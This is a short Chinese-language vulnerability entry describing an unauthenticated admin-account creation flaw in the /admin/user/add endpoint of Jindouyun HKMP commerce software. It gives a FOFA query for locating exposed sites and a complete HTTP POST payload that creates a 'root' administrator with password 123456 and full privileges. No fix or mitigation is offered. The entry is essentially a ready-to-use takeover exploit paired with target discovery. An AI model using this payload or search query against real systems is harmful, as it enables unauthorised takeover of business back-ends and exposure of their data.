J30-1金斗云-HKMP智慧商业软件-PermissionAC

漏洞描述：

金斗云 HKMP智慧商业软件 /admin/user/add 接口存在任意用户创建漏洞，未经身份验证的远程攻击者可以利用此漏洞创建管理员账户，从而接管系统后台，造成信息泄露，导致系统处于极不安全的状态。

网站图片：

fofa语法：

body=“金斗云 Copyright”

漏洞复现：

payload：

POST /admin/user/add HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate

{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1719305067,"nonce":5223015867,"sign":"hkmp","data":{"userCode":"root","userName":"root","password":"123456","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"系统管理员"}}

效果图：

登录后台
效果图：